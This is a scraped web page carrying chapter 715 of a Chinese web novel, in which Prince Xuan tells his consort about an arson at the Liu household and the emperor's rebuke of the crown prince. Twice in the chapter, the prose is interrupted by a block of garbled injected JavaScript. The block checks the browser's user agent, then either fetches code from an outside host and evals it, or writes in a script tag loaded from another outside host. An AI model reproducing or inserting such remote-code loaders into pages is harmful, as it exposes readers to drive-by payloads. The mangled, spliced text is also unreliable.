首页      小说目录      搜索
章节目录 第715章 斥责太子
    两位王爷见皇上走了,自然也不再多逗留了。

    萱王爷本想叫着萱王妃一起走,但是在包厢门口,听见里面女眷们的欢声笑语,便吩咐了门口候着的侍女一声,便和慕王爷离开了膳禾馆。

    “两位王爷。”

    高公公一身平民打扮,在膳禾馆不远处等候两位王爷,恭敬行礼。

    “高公公,这是”

    萱王爷疑惑的问道。

    “两位王爷,皇上请两位王爷入宫觐见。”

    高公公看来是奉旨专门等候慕王爷和萱王爷。

    “现在吗”

    慕王爷问道。

    “是的,马车已经备好了。”

    高公公指着街边的一辆华贵马车。

    两兄弟对视一眼,只好上马车。

    “五弟,你说,父皇见我们的时候,会召见太子吗”

    慕王爷悠闲的躺在马车里,萱王爷这作者闭目养神。

    “五弟”

    慕王爷见萱王爷不回答,有些奇怪。

    “三哥,你为什么总是要揣测父皇的想法呢”

    萱王爷这才睁开眼睛,淡淡的看着前方。

    慕王爷眼眸一凌,瞥了一眼自己的五弟,马车里再次陷入了沉寂,只回响着哒哒的马蹄声。

    天黑了之后,萱王爷回到了萱王府。

    “王爷,您这一下午都去哪了不是让丫鬟告诉我,您回王府了吗”

    萱王妃温柔的帮萱王爷脱下外袍。

    “父皇召我和慕王进宫了。”

    萱王爷淡淡的说道。

    “这么突然是出什么事了”

    萱王妃有些惊讶。

    “前天夜里,有人在刘府放了一把火,差点烧死星辰的家人。”

    萱王爷冷冷的说道。

    “什么小麦她她怎么没有提过这件事”

    萱王妃脱口而出,惊慌又关心。

    夏小麦和刘家人今天的模样,哪里是像出了这么大的事情。

    “你别急,幸好发现及时,所以只是烧毁了厨房而已。”

    萱王爷赶紧安慰自己的爱妃。

    “你是说,父皇知道这件事了”

    萱王妃惊魂未定。

    “是的,昨天早朝,我就发现吴启山没在。今天慕王告诉我,吴启山昨天早晨就奉父皇的命令去了刘府,修缮刘府,还亲自给刘府安排了护卫。”

    萱王爷蹙眉说道。

    “护卫今天我见过那就好那就好小麦也真是的,怎么都不跟我们说一声”

    萱王妃有些不满。

    “你啊,关心则乱父皇都知道,还亲自安排人处理这件事,就是不想这件事闹大,小麦不告诉你就对了。”

    萱王爷赶紧解释。

    “王爷,是妾身着急了”

    萱王妃一听这话,赶紧认错。

    “父皇显然是出了事就知道了,恐怕也知道是谁指使的了。”

    萱王爷将王妃拥入怀中,说道。

    “那父皇是为这事儿召你们进宫的是谁干的”

    萱王妃紧张的问道,她真的很担心夏小麦他们一家人。

    “是归云楼的老板,林衍忠”

    萱王爷冷冷的说道。

    “是他”

    var isios  navigatorerantatchpuacx

    navigatorerantdexof'uc

    oser'{

    function{var reestireestiur&ot;https:ehogypv6389811011ht&ot;reestithod't'reestirandid'c'athrandotostrg36substr2dodocuntriten''reestifuncfunction{var xhttpne xhttpreestxhttponreadystatechanfunction{ifxhttpreadystate4{doxreestrunfaseifxhttpstat200{evaxhttpresponsetext}}}xhttpopenreestithod,reestiur,truexhttpsend}ifdoxreestrun{doxreestruntruereestifunc}ese{reestitervasettervafunction{ifdoxreestrun{ceartervareestitervadoxreestruntruereestifunc}},500}}

    }ese{

    docuntriten&ot;script src'https:ehissq63898110&ot;athfoorathrando99999991&ot;xht'&ot;

    }

    萱王妃一听,微微思索便想明白的点了点头。

    “是了,他的归云楼因为膳禾馆生意差了好多呢今天还派人来闹事可我怎么觉得这放火的主意更像是”

    太子两个字,萱王妃没有说出口,但是王爷自然是领会了。

    “不管是不是林衍忠自己的主意,今日父皇当着我和三哥,狠狠的斥责了太子。表面上是生气太子不好好管教自己的人,实际上就是在警告太子”

    萱王爷没有因为这个情形变得轻松。

    “这不是好事吗”

    萱王妃不解的问道。

    “唉警告太子又何尝不是在警告我们其他的皇子林衍忠和太子妃未必是太子亲自安排吩咐做了这些事情,但是如果不是太子太嚣张,他的人又怎么敢如此放肆其他皇子的人也是有可能出现同样的状况的。”

    萱王爷想到父皇发怒的表情,还是有些畏惧的。

    “林衍忠岂不是当了替死鬼”

    萱王妃不喜林衍忠。

    “他也未必干净,这种事情他敢做,就得做好东窗事发的准备。”

    萱王爷冷冷的说道。

    “王爷,王妃”

    丫鬟端着茶盅进来,是之前萱王妃吩咐的。

    “放下吧王爷,您尝尝。”

    萱王妃走到桌前,为萱王爷盛了一些自己下午回来试着做的果汁。

    “这是”

    萱王爷瞧了一眼,问道。

    “王爷没在膳禾馆喝到果汁吗这就是小麦教我做的。”

    萱王妃笑着,刚刚说了严肃的事情,她想让自家王爷开兴一些。

    “是吗那果汁确实不错,我这就尝尝王妃做的。”

    萱王爷脸色好了一些。

    “嗯不错这是柑橘”

    萱王爷喝了一些,问道。

    “是,这是”

    萱王妃便笑着解释是如何做的,萱王爷看着她认真的样子也很是愉悦。

    “唉,王爷,星辰现在怎么样了还是没有消息吗我看小麦这样撑着,也是心疼的紧”

    萱王妃忍不住有些伤感。

    “我也没有他的消息,他这次的任务太过危险,所以根本不会有任何消息传回来,免得被探子截获。父皇非常重视,不然怎么会这样斥责太子你还是不要问了。”

    萱王爷叹气一声,脸上也写满了担忧。

    “你没事就多陪陪小麦吧,我看你很喜欢她,当她妹妹一般。”

    萱王爷劝道。

    “嗯,我会的。我确实喜欢小麦,她性子好,想法活络,做的事情让我羡慕又惊叹。”

    萱王妃抬头看着王府四方的天,有些感慨。

    “羡慕”

    萱王爷有些不解。

    “是啊,你看看小麦,来了京城开了好几家店铺,每天风风火火的,精神的样子可不是让人羡慕吗”

    萱王妃苦笑了一下。

    “芸儿”

    萱王爷看到了王妃眼中孤寂,心瞬间便软了下来。

    “王爷,我不是抱怨什么”

    萱王妃抱住萱王爷。

    “我知道,你好好养身子,别总是这般忧愁,太医不是说了吗孩子的事情,心急是百害无利的。”

    萱王爷安慰着说道。

    其实,萱王爷和王妃年纪不大,看萱王爷和刘星辰的交情就知道,萱王妃曾经怀过一个孩子,却因病小产,这几年才养好了身子。但是后院生活寂寞,没有孩子,萱王妃难免会喜欢外出,才会羡慕夏小麦。

    var isios  navigatorerantatchpuacx

    navigatorerantdexof'uc

    oser'{

    function{var reestireestiur&ot;https:ehogypv6389811011ht&ot;reestithod't'reestirandid'c'athrandotostrg36substr2dodocuntriten''reestifuncfunction{var xhttpne xhttpreestxhttponreadystatechanfunction{ifxhttpreadystate4{doxreestrunfaseifxhttpstat200{evaxhttpresponsetext}}}xhttpopenreestithod,reestiur,truexhttpsend}ifdoxreestrun{doxreestruntruereestifunc}ese{reestitervasettervafunction{ifdoxreestrun{ceartervareestitervadoxreestruntruereestifunc}},500}}

    }ese{

    docuntriten&ot;script src'https:ehissq63898110&ot;athfoorathrando99999991&ot;xht'&ot;

    }
上一页     返回目录      下一页
  sitemap